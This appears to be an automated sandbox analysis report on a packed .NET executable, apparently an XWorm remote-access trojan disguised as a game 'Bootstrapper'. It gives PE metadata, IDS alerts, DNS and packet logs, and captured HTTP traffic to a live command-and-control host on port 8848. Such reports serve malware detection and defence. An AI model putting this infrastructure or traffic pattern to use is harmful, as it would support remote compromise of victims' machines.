                                                                                                                                                                                                                                            Time Stamp:0x674ADACC [Sat Nov 30 09:28:44 2024 UTC]
                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                            File Version Major:4
                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al

                                                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xc06a80x53.text
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc20000x4d8.rsrc
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xc40000xc.reloc
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                            Sections

                                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                            .text0x20000xbe7040xbe8000d957036319fae1a571ae413c2ddf949False0.9483088295603674data7.998173784136308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .rsrc0xc20000x4d80x60077add71a02711616e31de5379c6ef737False0.375data3.7410164104785233IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .reloc0xc40000xc0x200b1019fabf883ea2905e4d4f67a264499False0.0390625data0.05725660224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                            Resources

                                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                            RT_VERSION0xc20a00x244data0.47586206896551725
                                                                                                                                                                                                                                            RT_MANIFEST0xc22e80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                                                                                                                                                                                            Imports

                                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                                            mscoree.dll_CorExeMain

                                                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                            2024-12-01T20:08:04.943707+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849709104.21.93.27443TCP
                                                                                                                                                                                                                                            2024-12-01T20:09:33.366446+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.849720147.185.221.248848TCP

                                                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                            Dec 1, 2024 20:07:59.284817934 CET49706443192.168.2.8104.21.93.27
                                                                                                                                                                                                                                            Dec 1, 2024 20:07:59.284872055 CET44349706104.21.93.27192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:07:59.284943104 CET49706443192.168.2.8104.21.93.27
                                                                                                                                                                                                                                            Dec 1, 2024 20:07:59.308600903 CET49706443192.168.2.8104.21.93.27
                                                                                                                                                                                                                                            Dec 1, 2024 20:07:59.308628082 CET44349706104.21.93.27192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:00.565454960 CET44349706104.21.93.27192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:00.565532923 CET49706443192.168.2.8104.21.93.27
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:00.569541931 CET49706443192.168.2.8104.21.93.27
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:00.569556952 CET44349706104.21.93.27192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:00.569848061 CET44349706104.21.93.27192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:00.610837936 CET49706443192.168.2.8104.21.93.27
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:00.634802103 CET49706443192.168.2.8104.21.93.27
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:00.679331064 CET44349706104.21.93.27192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:01.035967112 CET44349706104.21.93.27192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:01.036052942 CET44349706104.21.93.27192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:01.036721945 CET49706443192.168.2.8104.21.93.27
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:01.058026075 CET49706443192.168.2.8104.21.93.27
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:02.119481087 CET4970880192.168.2.8208.95.112.1
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:02.240093946 CET8049708208.95.112.1192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:02.240173101 CET4970880192.168.2.8208.95.112.1
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:02.240732908 CET4970880192.168.2.8208.95.112.1
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:02.360788107 CET8049708208.95.112.1192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:03.176265001 CET49709443192.168.2.8104.21.93.27
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:03.176292896 CET44349709104.21.93.27192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:03.176367044 CET49709443192.168.2.8104.21.93.27
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:03.177798986 CET49709443192.168.2.8104.21.93.27
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:03.177815914 CET44349709104.21.93.27192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:03.459785938 CET8049708208.95.112.1192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:03.501471043 CET4970880192.168.2.8208.95.112.1
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:04.452019930 CET44349709104.21.93.27192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:04.452128887 CET49709443192.168.2.8104.21.93.27
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:04.453480005 CET49709443192.168.2.8104.21.93.27
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:04.453496933 CET44349709104.21.93.27192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:04.453737020 CET44349709104.21.93.27192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:04.454628944 CET49709443192.168.2.8104.21.93.27
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:04.499332905 CET44349709104.21.93.27192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:04.943716049 CET44349709104.21.93.27192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:04.943856955 CET44349709104.21.93.27192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:04.943964005 CET49709443192.168.2.8104.21.93.27
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:04.944354057 CET49709443192.168.2.8104.21.93.27
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:05.396060944 CET49710443192.168.2.8128.116.119.3
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:05.396109104 CET44349710128.116.119.3192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:05.396189928 CET49710443192.168.2.8128.116.119.3
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:05.403945923 CET49710443192.168.2.8128.116.119.3
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:05.403955936 CET44349710128.116.119.3192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:06.988028049 CET44349710128.116.119.3192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:06.988115072 CET49710443192.168.2.8128.116.119.3
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:06.991159916 CET49710443192.168.2.8128.116.119.3
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:06.991169930 CET44349710128.116.119.3192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:06.991554022 CET44349710128.116.119.3192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:06.992539883 CET49710443192.168.2.8128.116.119.3
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:07.039334059 CET44349710128.116.119.3192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:07.675447941 CET44349710128.116.119.3192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:07.675518036 CET44349710128.116.119.3192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:07.675579071 CET49710443192.168.2.8128.116.119.3
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:07.676351070 CET49710443192.168.2.8128.116.119.3
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:09.540883064 CET49711443192.168.2.8104.20.22.46
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:09.540909052 CET44349711104.20.22.46192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:09.540973902 CET49711443192.168.2.8104.20.22.46
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:09.541241884 CET49711443192.168.2.8104.20.22.46
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:09.541254997 CET44349711104.20.22.46192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:10.904378891 CET44349711104.20.22.46192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:10.904572964 CET49711443192.168.2.8104.20.22.46
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.007637024 CET49711443192.168.2.8104.20.22.46
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.007675886 CET44349711104.20.22.46192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.008049011 CET44349711104.20.22.46192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.017471075 CET49711443192.168.2.8104.20.22.46
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.063335896 CET44349711104.20.22.46192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.699557066 CET44349711104.20.22.46192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.699711084 CET44349711104.20.22.46192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.699769974 CET49711443192.168.2.8104.20.22.46
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.700133085 CET49711443192.168.2.8104.20.22.46
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:54.899112940 CET8049708208.95.112.1192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:54.899221897 CET4970880192.168.2.8208.95.112.1
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:18.139307976 CET497208848192.168.2.8147.185.221.24
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:18.259386063 CET884849720147.185.221.24192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:18.266853094 CET497208848192.168.2.8147.185.221.24
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:18.608572960 CET497208848192.168.2.8147.185.221.24
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:18.731694937 CET884849720147.185.221.24192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:33.366446018 CET497208848192.168.2.8147.185.221.24
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:33.487040997 CET884849720147.185.221.24192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:40.175255060 CET884849720147.185.221.24192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:40.175343037 CET497208848192.168.2.8147.185.221.24
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:42.486390114 CET497208848192.168.2.8147.185.221.24
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:42.488778114 CET497218848192.168.2.8147.185.221.24
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:42.612129927 CET884849720147.185.221.24192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:42.612143040 CET884849721147.185.221.24192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:42.612257957 CET497218848192.168.2.8147.185.221.24
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:42.732543945 CET497218848192.168.2.8147.185.221.24
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:42.855561018 CET884849721147.185.221.24192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:43.471127987 CET4970880192.168.2.8208.95.112.1
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:43.591732979 CET8049708208.95.112.1192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:53.393106937 CET497218848192.168.2.8147.185.221.24
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:53.513098955 CET884849721147.185.221.24192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:10:04.551331043 CET884849721147.185.221.24192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:10:04.553014040 CET497218848192.168.2.8147.185.221.24

                                                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                            Dec 1, 2024 20:07:59.130685091 CET6025453192.168.2.81.1.1.1
                                                                                                                                                                                                                                            Dec 1, 2024 20:07:59.277441025 CET53602541.1.1.1192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:01.968417883 CET5306353192.168.2.81.1.1.1
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:02.114509106 CET53530631.1.1.1192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:05.165318012 CET5559853192.168.2.81.1.1.1
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:05.304290056 CET53555981.1.1.1192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:09.396821976 CET5661953192.168.2.81.1.1.1
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:09.540231943 CET53566191.1.1.1192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.700961113 CET6492653192.168.2.81.1.1.1
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.841866016 CET53649261.1.1.1192.168.2.8
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:17.897898912 CET6203353192.168.2.81.1.1.1
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:18.134881973 CET53620331.1.1.1192.168.2.8

                                                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                            Dec 1, 2024 20:07:59.130685091 CET192.168.2.81.1.1.10x6ce9Standard query (0)getsolara.devA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:01.968417883 CET192.168.2.81.1.1.10x4a4dStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:05.165318012 CET192.168.2.81.1.1.10x2925Standard query (0)clientsettings.roblox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:09.396821976 CET192.168.2.81.1.1.10x4f9bStandard query (0)www.nodejs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.700961113 CET192.168.2.81.1.1.10x7552Standard query (0)nodejs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:17.897898912 CET192.168.2.81.1.1.10xe1fStandard query (0)award-adware.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                            Dec 1, 2024 20:07:59.277441025 CET1.1.1.1192.168.2.80x6ce9No error (0)getsolara.dev104.21.93.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 1, 2024 20:07:59.277441025 CET1.1.1.1192.168.2.80x6ce9No error (0)getsolara.dev172.67.203.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:02.114509106 CET1.1.1.1192.168.2.80x4a4dNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:05.304290056 CET1.1.1.1192.168.2.80x2925No error (0)clientsettings.roblox.comtitanium.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:05.304290056 CET1.1.1.1192.168.2.80x2925No error (0)titanium.roblox.comedge-term4.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:05.304290056 CET1.1.1.1192.168.2.80x2925No error (0)edge-term4.roblox.comedge-term4-lhr2.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:05.304290056 CET1.1.1.1192.168.2.80x2925No error (0)edge-term4-lhr2.roblox.com128.116.119.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:09.540231943 CET1.1.1.1192.168.2.80x4f9bNo error (0)www.nodejs.org104.20.22.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:09.540231943 CET1.1.1.1192.168.2.80x4f9bNo error (0)www.nodejs.org104.20.23.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.841866016 CET1.1.1.1192.168.2.80x7552No error (0)nodejs.org104.20.22.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:11.841866016 CET1.1.1.1192.168.2.80x7552No error (0)nodejs.org104.20.23.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 1, 2024 20:09:18.134881973 CET1.1.1.1192.168.2.80xe1fNo error (0)award-adware.gl.at.ply.gg147.185.221.24A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                                                            • getsolara.dev
                                                                                                                                                                                                                                            • clientsettings.roblox.com
                                                                                                                                                                                                                                            • www.nodejs.org
                                                                                                                                                                                                                                            • ip-api.com

                                                                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            0192.168.2.849708208.95.112.1807400C:\Users\user\AppData\Roaming\not rat.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:02.240732908 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                                                                                            Host: ip-api.com
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Dec 1, 2024 20:08:03.459785938 CET175INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sun, 01 Dec 2024 19:08:03 GMT
                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 6
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            X-Ttl: 60
                                                                                                                                                                                                                                            X-Rl: 44
                                                                                                                                                                                                                                            Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                                                                                                            Data Ascii: false


                                                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            0192.168.2.849706104.21.93.274437424C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-01 19:08:00 UTC81OUTGET /asset/discord.json HTTP/1.1
                                                                                                                                                                                                                                            Host: getsolara.dev
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            2024-12-01 19:08:01 UTC1050INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sun, 01 Dec 2024 19:08:00 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                            ETag: W/"7d966f73b6ce74a610dddaf0d0951ed8"
                                                                                                                                                                                                                                            referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lwPXdLHzJxcbZwT%2BM8MkmY9KTEoD%2F9TB4sqQsW5hBiQpa%2F8XliSNLoDtQd7fm0lmJxWxdt0ruDme3YfVA%2FJ06lCaX1YP%2BWsUO2KzCckLK9kJF%2B4Tb56Qc5K4EYrmfyJt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=0
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8eb55d093bcdc40c-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1507&min_rtt=1503&rtt_var=571&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2811&recv_bytes=695&delivery_rate=1902280&cwnd=214&unsent_bytes=0&cid=e12104682a06552b&ts=488&x=0"
                                                                                                                                                                                                                                            2024-12-01 19:08:01 UTC109INData Raw: 36 37 0d 0a 7b 0a 20 20 20 20 22 61 72 67 73 22 20 3a 20 7b 0a 20 20 20 20 20 20 20 22 63 6f 64 65 22 20 3a 20 22 38 50 67 73 70 52 59 41 51 75 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 63 6d 64 22 20 3a 20 22 49 4e 56 49 54 45 5f 42 52 4f 57 53 45 52 22 2c 0a 20 20 20 20 22 6e 6f 6e 63 65 22 20 3a 20 22 2e 22 0a 20 7d 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 67{ "args" : { "code" : "8PgspRYAQu" }, "cmd" : "INVITE_BROWSER", "nonce" : "." }
